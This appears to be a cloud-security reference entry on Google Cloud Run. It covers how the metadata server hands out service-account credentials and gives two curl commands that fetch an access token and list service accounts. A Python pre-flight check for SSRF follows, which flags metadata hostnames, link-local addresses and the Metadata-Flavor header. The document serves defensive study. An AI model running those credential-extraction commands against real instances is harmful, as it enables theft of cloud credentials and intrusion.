Google Cloud Run

Google Cloud Run is a managed platform for running web applications.

Property                        Value
Credentials delivery mechanism  Served through link-local metadata service
Protection type                 Header requires hardcoded value
Exploitation primitives         Query arbitrary URL with arbitrary HTTP header

Extracting credentials

The Google Cloud metadata server is available at 169.254.169.254 (the name metadata.google.internal used below resolves to that address) and requires the HTTP header Metadata-Flavor set to Google; requests without that header are refused:

curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

You can also list the service accounts attached to the instance to check whether any non-default ones are present:

curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
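The two requests above show what an application-side SSRF filter has to catch: a destination that is the metadata hostname or a link-local address, and an outbound request that carries the Metadata-Flavor header. The following is an added example, not code from the original page or from Google; it is a pre-flight check a service could run on a user-supplied URL and header set before making an outbound fetch. The function names (check_outbound, _is_blocked_address) and the optional resolver callback are assumptions of this example; blocking the whole 169.254.0.0/16 range rather than only 169.254.169.254 is a design choice.

```python
"""Pre-flight SSRF check for outbound requests toward the GCP metadata service.

Added example, not part of the original page. Flags URLs whose host is the
metadata hostname or a link-local IPv4 address, and requests that carry the
Metadata-Flavor header the metadata server requires.
"""
import ipaddress
from typing import Callable, Iterable, List, Mapping, Optional
from urllib.parse import urlsplit

METADATA_HOSTNAME = "metadata.google.internal"          # named on the page
LINK_LOCAL_V4 = ipaddress.ip_network("169.254.0.0/16")  # design choice: block the whole link-local block
METADATA_HEADER = "metadata-flavor"                      # header name, compared case-insensitively

# Assumption: the caller supplies a resolver (hostname -> iterable of address strings)
# so that a hostname pointing at a link-local address is caught as well.
Resolver = Callable[[str], Iterable[str]]


def _is_blocked_address(text: str) -> bool:
    """True if text is a literal IPv4 address inside the link-local range."""
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return False  # not an IP literal (a hostname), handled by the caller
    return addr.version == 4 and addr in LINK_LOCAL_V4


def check_outbound(url: str, headers: Mapping[str, str],
                   resolver: Optional[Resolver] = None) -> List[str]:
    """Return a list of findings; an empty list means the request passed the check."""
    findings: List[str] = []
    # urlsplit lowercases the host and strips IPv6 brackets for us
    host = (urlsplit(url).hostname or "").rstrip(".")

    if host == METADATA_HOSTNAME:
        findings.append(f"host {host!r} is the metadata hostname")
    if _is_blocked_address(host):
        findings.append(f"host {host!r} is a link-local address")
    elif resolver is not None and host:
        # A hostname is only as safe as what it resolves to
        for addr in resolver(host):
            if _is_blocked_address(addr):
                findings.append(f"host {host!r} resolves to link-local {addr}")
                break

    for name, value in headers.items():
        if name.lower() == METADATA_HEADER:
            findings.append(f"request carries {name}: {value}")
    return findings


if __name__ == "__main__":
    # Constructed sample requests mirroring the commands on the page
    samples = [
        ("http://metadata.google.internal/computeMetadata/v1/instance/"
         "service-accounts/default/token", {"Metadata-Flavor": "Google"}),
        ("http://169.254.169.254/computeMetadata/v1/", {}),
        ("https://example.com/feed.xml", {"Accept": "*/*"}),
    ]
    for sample_url, sample_headers in samples:
        print(sample_url, "->", check_outbound(sample_url, sample_headers) or "ok")
```

The check is deliberately a first pass: it does not follow HTTP redirects, it does not catch non dotted-quad spellings of the address (decimal or octal forms), and without a resolver it cannot see a hostname that points at 169.254.169.254. In practice the resolved address should be re-checked at connect time and redirects should be disabled or re-validated, since the page's "query arbitrary URL" primitive is exactly what such bypasses exploit.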
